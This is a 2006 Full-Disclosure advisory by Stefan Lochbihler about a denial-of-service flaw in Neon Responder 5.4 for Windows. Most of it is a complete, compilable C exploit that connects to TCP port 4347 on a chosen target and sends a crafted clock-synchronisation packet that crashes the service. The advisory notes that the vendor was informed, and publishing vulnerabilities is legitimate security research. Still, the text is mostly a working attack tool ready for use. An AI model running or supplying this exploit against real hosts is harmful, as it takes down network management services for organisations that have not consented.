Author:                    Stefan Lochbihler
Date:                      17.04.2006
Affected Software:         Neon Responder for Windows
Software                   5.4
Software                   http://www.neon.com/NRwin.shtml
Attack:                    Dos



Overview:
Neon Responders greatly enhance the functionality of LANsurveyor
by providing LANsurveyor with direct access to computers with the
Responder client installed. This direct access allows LANsurveyor
to provide complete hardware and software asset reports, distribute
software, and directly manage the client computers, either
individually or as a group.


Details:
Through a specially crafted "Clock Synchronisation" packet an
access violation occur and Neon Responder stops immediately.




Exploit:
/* Stefan Lochbihler*/

#include <stdio.h>
#include <stdlib.h>
#include <winsock2.h>

#pragma comment(lib,"ws2_32")

#define PORT 4347
char CLOCK_MSG [] = 
"\x00\x0e\x5a\x00\x4c\xe9\x24\xb1\x17\x88\x40\x84";   //Password = ""

void usage (char*);
void endpgr (char *,SOCKET, char*);
unsigned long gethost (char *);


int main(int argc, char *argv[])
{

   WSADATA wsa;
   SOCKET client;
   sockaddr_in peer;
   WORD wsVersion;

   char sendbuffer[16]="";
   char recvbuffer[16]="";
   unsigned long host=0;
   int err=0;

   if(argc<2)
     usage(argv[0]);

   printf("\n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler 
~~~~~~\n\n");


   if(WSAStartup(wsVersion=MAKEWORD(2,2),&wsa)!=0)
   {
       printf("WSAStartup() fail\n");
       exit(0);
   }

   printf("%s:[+] Try to create socket\n",argv[0]);
   client=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
   if(client==INVALID_SOCKET)
      endpgr(argv[0],client,"[-] socket() fail");

   printf("%s:[+] Lookup host\n",argv[0]);
   if(!(host=gethost(argv[1])))
      endpgr(argv[0],client,"[-] host not found !");

   peer.sin_family = AF_INET;
   peer.sin_port = htons(PORT);
   peer.sin_addr.s_addr = host;
      printf("%s:[+] Connect to %s\n",argv[0],argv[1]);
   err=connect(client,(SOCKADDR*)&peer,sizeof(struct sockaddr_in));
   if(err)
     endpgr(argv[0],client,"[-] connect() fail");

   memcpy(sendbuffer,CLOCK_MSG,sizeof(CLOCK_MSG));
      printf("%s:[+] Try to send packet\n",argv[0]);
   err=send(client,sendbuffer,sizeof(sendbuffer),0);
   err=recv(client,recvbuffer,sizeof(recvbuffer)-1,0);

   endpgr(argv[0],client,"[+] End successfully");

   return 0;

}

void usage(char *pgrname)
{
printf("\n~~~~~~ Neon Responder DoS - (c) by Stefan Lochbihler 
~~~~~~\n\n");
printf("%s: <Targethost>\n",pgrname);
exit(0);
}

void endpgr (char *pgrname, SOCKET client,char *msg)
{
   printf("%s:%s\n",pgrname,msg);
   WSACleanup();
   closesocket(client);
   exit(0);
}

unsigned long gethost(char *targethost)
{
unsigned long host=0;
hostent *phost=NULL;


host=inet_addr(targethost);
if(host==INADDR_NONE)
{
   if((phost=gethostbyname(targethost))==NULL)
      return 0;
   host=*(unsigned long*)phost->h_addr;
}

return host;   }


Vendor Status: The Vendor is informed !


Discovered and Copyright by
Lochbihler Stefan
http://www.xion-security.at

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/